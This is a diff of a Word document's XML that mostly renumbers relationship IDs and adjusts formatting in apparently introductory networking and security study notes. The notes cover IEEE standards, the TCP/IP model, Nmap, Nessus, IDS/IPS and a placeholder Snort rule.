                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5494,7 +5994,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId72" w:tooltip="IEEE 1394" w:history="1">
+            <w:hyperlink r:id="rId74" w:tooltip="IEEE 1394" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5554,7 +6054,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId73" w:tooltip="IEEE 1471" w:history="1">
+            <w:hyperlink r:id="rId75" w:tooltip="IEEE 1471" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5583,7 +6083,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId74" w:tooltip="Software architecture" w:history="1">
+            <w:hyperlink r:id="rId76" w:tooltip="Software architecture" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5603,7 +6103,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> / </w:t>
             </w:r>
-            <w:hyperlink r:id="rId75" w:tooltip="System architecture" w:history="1">
+            <w:hyperlink r:id="rId77" w:tooltip="System architecture" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5638,7 +6138,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId76" w:tooltip="IEEE 1541" w:history="1">
+            <w:hyperlink r:id="rId78" w:tooltip="IEEE 1541" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5667,7 +6167,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId77" w:tooltip="Binary prefix" w:history="1">
+            <w:hyperlink r:id="rId79" w:tooltip="Binary prefix" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5702,7 +6202,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId78" w:tooltip="IEEE 1584" w:history="1">
+            <w:hyperlink r:id="rId80" w:tooltip="IEEE 1584" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5739,7 +6239,7 @@
               </w:rPr>
               <w:t xml:space="preserve">Guide for Performing </w:t>
             </w:r>
-            <w:hyperlink r:id="rId79" w:tooltip="Arc Flash" w:history="1">
+            <w:hyperlink r:id="rId81" w:tooltip="Arc Flash" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5782,7 +6282,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId80" w:tooltip="IEEE 1588" w:history="1">
+            <w:hyperlink r:id="rId82" w:tooltip="IEEE 1588" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5842,7 +6342,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId81" w:tooltip="IEEE P1619" w:history="1">
+            <w:hyperlink r:id="rId83" w:tooltip="IEEE P1619" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5902,7 +6402,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId82" w:tooltip="IEEE 1666 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId84" w:tooltip="IEEE 1666 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5962,7 +6462,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId83" w:tooltip="IEEE 1667" w:history="1">
+            <w:hyperlink r:id="rId85" w:tooltip="IEEE 1667" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6022,7 +6522,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId84" w:tooltip="Unified Power Format" w:history="1">
+            <w:hyperlink r:id="rId86" w:tooltip="Unified Power Format" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6051,7 +6551,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId85" w:tooltip="Unified Power Format" w:history="1">
+            <w:hyperlink r:id="rId87" w:tooltip="Unified Power Format" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6085,7 +6585,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId86" w:tooltip="IEEE 1849" w:history="1">
+            <w:hyperlink r:id="rId88" w:tooltip="IEEE 1849" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6161,7 +6661,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId87" w:tooltip="IEEE 1855" w:history="1">
+            <w:hyperlink r:id="rId89" w:tooltip="IEEE 1855" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6236,7 +6736,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId88" w:tooltip="IEEE 1901" w:history="1">
+            <w:hyperlink r:id="rId90" w:tooltip="IEEE 1901" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6273,7 +6773,7 @@
               </w:rPr>
               <w:t xml:space="preserve">Broadband over </w:t>
             </w:r>
-            <w:hyperlink r:id="rId89" w:tooltip="Power line communication" w:history="1">
+            <w:hyperlink r:id="rId91" w:tooltip="Power line communication" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6323,7 +6823,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId90" w:tooltip="IEEE P1906.1" w:history="1">
+            <w:hyperlink r:id="rId92" w:tooltip="IEEE P1906.1" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6398,7 +6898,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId91" w:tooltip="IEEE 2600 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId93" w:tooltip="IEEE 2600 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6473,7 +6973,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId92" w:tooltip="IEEE 12207" w:history="1">
+            <w:hyperlink r:id="rId94" w:tooltip="IEEE 12207" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6502,7 +7002,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId93" w:tooltip="Information Technology" w:history="1">
+            <w:hyperlink r:id="rId95" w:tooltip="Information Technology" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6560,7 +7060,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId94" w:tooltip="IEEE Switchgear Committee (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId96" w:tooltip="IEEE Switchgear Committee (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6634,7 +7134,6 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Few standard ports</w:t>
       </w:r>
     </w:p>
@@ -6651,7 +7150,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId95" w:history="1">
+      <w:hyperlink r:id="rId97" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6983,7 +7482,6 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>TCP/IP Model</w:t>
       </w:r>
     </w:p>
@@ -7078,6 +7576,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -7097,7 +7596,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId96">
+                    <a:blip r:embed="rId98">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7159,7 +7658,11 @@
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>We just talked about ARP being a protocol of Internet layer, but there is a conflict about declaring it as a protocol of Internet Layer or Network access layer. It is described as residing in layer 3, being encapsulated by layer 2 protocols.</w:t>
+        <w:t xml:space="preserve">We just talked about ARP being a protocol of Internet layer, but there is a conflict about </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>declaring it as a protocol of Internet Layer or Network access layer. It is described as residing in layer 3, being encapsulated by layer 2 protocols.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7167,7 +7670,6 @@
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>2. Internet Layer –</w:t>
       </w:r>
     </w:p>
@@ -7304,7 +7806,7 @@
       <w:r>
         <w:t xml:space="preserve">This layer performs the functions of top three layers of the OSI model: Application, Presentation and Session Layer. It is responsible for node-to-node communication and controls user-interface specifications. Some of the protocols present in this layer are : HTTP, HTTPS, FTP, TFTP, Telnet, SSH, SMTP, SNMP, NTP, DNS, DHCP, NFS, X Window, LPD. Have a look at </w:t>
       </w:r>
-      <w:hyperlink r:id="rId97" w:history="1">
+      <w:hyperlink r:id="rId99" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7348,6 +7850,7 @@
         <w:rPr>
           <w:rStyle w:val="Strong"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>SSH –</w:t>
       </w:r>
       <w:r>
@@ -7367,7 +7870,6 @@
         <w:rPr>
           <w:rStyle w:val="Strong"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>NTP –</w:t>
       </w:r>
       <w:r>
@@ -7438,8 +7940,8 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:451.5pt;height:221.25pt">
-            <v:imagedata r:id="rId98" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(2)"/>
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:451.8pt;height:221.4pt">
+            <v:imagedata r:id="rId100" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(2)"/>
             <v:shadow opacity=".5"/>
           </v:shape>
         </w:pict>
@@ -7461,6 +7963,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DD96F22" wp14:editId="498956E0">
@@ -7480,7 +7983,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId99">
+                    <a:blip r:embed="rId101">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7534,6 +8037,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41E3667A" wp14:editId="4BDF357B">
@@ -7553,7 +8057,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId100">
+                    <a:blip r:embed="rId102">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7609,8 +8113,8 @@
     <w:p>
       <w:r>
         <w:pict>
-          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:451.5pt;height:149.25pt">
-            <v:imagedata r:id="rId101" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(1)"/>
+          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:451.8pt;height:149.4pt">
+            <v:imagedata r:id="rId103" o:title="Screenshot-2018-4-27 TCP IP Reference Nmap Network Scanning(1)"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -7788,6 +8292,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33EB4B8D" wp14:editId="5CD13B3E">
@@ -7805,7 +8310,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId102"/>
+                    <a:blip r:embed="rId104"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8014,7 +8519,7 @@
       <w:r>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:hyperlink r:id="rId103" w:tooltip="Internet Protocol" w:history="1">
+      <w:hyperlink r:id="rId105" w:tooltip="Internet Protocol" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8057,7 +8562,7 @@
       <w:r>
         <w:t xml:space="preserve">uration) in </w:t>
       </w:r>
-      <w:hyperlink r:id="rId104" w:tooltip="Microsoft Windows" w:history="1">
+      <w:hyperlink r:id="rId106" w:tooltip="Microsoft Windows" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8068,7 +8573,7 @@
       <w:r>
         <w:t xml:space="preserve"> is a </w:t>
       </w:r>
-      <w:hyperlink r:id="rId105" w:tooltip="Console application" w:history="1">
+      <w:hyperlink r:id="rId107" w:tooltip="Console application" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8079,7 +8584,7 @@
       <w:r>
         <w:t xml:space="preserve"> that displays all current </w:t>
       </w:r>
-      <w:hyperlink r:id="rId106" w:tooltip="TCP/IP" w:history="1">
+      <w:hyperlink r:id="rId108" w:tooltip="TCP/IP" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8090,7 +8595,7 @@
       <w:r>
         <w:t xml:space="preserve"> network configuration values and can modify </w:t>
       </w:r>
-      <w:hyperlink r:id="rId107" w:tooltip="Dynamic Host Configuration Protocol" w:history="1">
+      <w:hyperlink r:id="rId109" w:tooltip="Dynamic Host Configuration Protocol" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8101,7 +8606,7 @@
       <w:r>
         <w:t xml:space="preserve"> (DHCP) and </w:t>
       </w:r>
-      <w:hyperlink r:id="rId108" w:tooltip="Domain Name System" w:history="1">
+      <w:hyperlink r:id="rId110" w:tooltip="Domain Name System" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8305,7 +8810,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId109" w:history="1">
+      <w:hyperlink r:id="rId111" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8403,7 +8908,7 @@
       <w:r>
         <w:t xml:space="preserve">To login we need to open the Nessus – This can be done by entering </w:t>
       </w:r>
-      <w:hyperlink r:id="rId110" w:anchor="/" w:history="1">
+      <w:hyperlink r:id="rId112" w:anchor="/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8863,8 +9368,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:pict>
-          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:413.25pt;height:216.75pt">
-            <v:imagedata r:id="rId111" o:title="snowoutput"/>
+          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:413.4pt;height:216.6pt">
+            <v:imagedata r:id="rId113" o:title="snowoutput"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -8926,6 +9431,7 @@
           <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="280F9F20" wp14:editId="7A585AD3">
@@ -8945,7 +9451,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId112">
+                    <a:blip r:embed="rId114">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9016,6 +9522,7 @@
           <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -9035,7 +9542,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId113">
+                    <a:blip r:embed="rId115">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9072,6 +9579,7 @@
           <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -9091,7 +9599,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId114">
+                    <a:blip r:embed="rId116">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -9141,8 +9649,8 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:pict>
-          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:334.5pt;height:288.75pt">
-            <v:imagedata r:id="rId115" o:title="stealthmain"/>
+          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:334.8pt;height:288.6pt">
+            <v:imagedata r:id="rId117" o:title="stealthmain"/>
           </v:shape>
         </w:pict>
       </w:r>
@@ -9834,7 +10342,7 @@
       <w:r>
         <w:t xml:space="preserve">Netcraft provide internet security services including </w:t>
       </w:r>
-      <w:hyperlink r:id="rId116" w:history="1">
+      <w:hyperlink r:id="rId118" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9845,7 +10353,7 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:hyperlink r:id="rId117" w:history="1">
+      <w:hyperlink r:id="rId119" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9856,7 +10364,7 @@
       <w:r>
         <w:t xml:space="preserve"> and </w:t>
       </w:r>
-      <w:hyperlink r:id="rId118" w:history="1">
+      <w:hyperlink r:id="rId120" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9867,7 +10375,7 @@
       <w:r>
         <w:t xml:space="preserve">. We also analyse many aspects of the internet, including the </w:t>
       </w:r>
-      <w:hyperlink r:id="rId119" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId121" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9878,7 +10386,7 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:hyperlink r:id="rId120" w:history="1">
+      <w:hyperlink r:id="rId122" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9889,7 +10397,7 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:hyperlink r:id="rId121" w:history="1">
+      <w:hyperlink r:id="rId123" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -9900,7 +10408,7 @@
       <w:r>
         <w:t xml:space="preserve"> and </w:t>
       </w:r>
-      <w:hyperlink r:id="rId122" w:history="1">
+      <w:hyperlink r:id="rId124" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -10254,6 +10762,7 @@
         <w:rPr>
           <w:b/>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -10263,7 +10772,7 @@
             <wp:cNvGraphicFramePr/>
             <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/diagram">
-                <dgm:relIds xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:dm="rId123" r:lo="rId124" r:qs="rId125" r:cs="rId126"/>
+                <dgm:relIds xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:dm="rId125" r:lo="rId126" r:qs="rId127" r:cs="rId128"/>
               </a:graphicData>
             </a:graphic>
           </wp:inline>
@@ -10617,7 +11126,7 @@
       <w:r>
         <w:t xml:space="preserve">Obviously there is so much to learn in everything so take a look at the tutorials point website: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId128" w:history="1">
+      <w:hyperlink r:id="rId130" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11156,6 +11665,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -11175,7 +11685,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId129" cstate="print">
+                    <a:blip r:embed="rId131" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -11209,6 +11719,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -11228,7 +11739,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId130">
+                    <a:blip r:embed="rId132">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -11505,6 +12016,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -11524,7 +12036,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId131">
+                    <a:blip r:embed="rId133">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -11696,7 +12208,7 @@
       <w:r>
         <w:t xml:space="preserve">An intrusion detection system (IDS) is a system that monitors network traffic for suspicious activity and issues alerts when such activity is discovered. While </w:t>
       </w:r>
-      <w:hyperlink r:id="rId132" w:history="1">
+      <w:hyperlink r:id="rId134" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11707,7 +12219,7 @@
       <w:r>
         <w:t xml:space="preserve"> and reporting is the primary function, some intrusion detection systems are capable of taking actions when malicious acitivity or anomalous traffic is detected, including blocking traffic sent from suspicious </w:t>
       </w:r>
-      <w:hyperlink r:id="rId133" w:history="1">
+      <w:hyperlink r:id="rId135" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11729,7 +12241,7 @@
       <w:r>
         <w:t xml:space="preserve">An </w:t>
       </w:r>
-      <w:hyperlink r:id="rId134" w:history="1">
+      <w:hyperlink r:id="rId136" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11740,7 +12252,7 @@
       <w:r>
         <w:t xml:space="preserve"> (IPS) also monitors network </w:t>
       </w:r>
-      <w:hyperlink r:id="rId135" w:history="1">
+      <w:hyperlink r:id="rId137" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11879,8 +12391,6 @@
       <w:r>
         <w:t xml:space="preserve">Example rule for detecting and usage of particular website: </w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:t>alert tcp any any -&gt; any any (msg:”some message”; content:”website url”; sid:&lt;uniqueid&gt;; rev:1;)</w:t>
       </w:r>
@@ -11980,6 +12490,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
@@ -12000,7 +12511,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId136" cstate="print">
+                    <a:blip r:embed="rId138" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -12034,6 +12545,7 @@
       <w:r>
         <w:rPr>
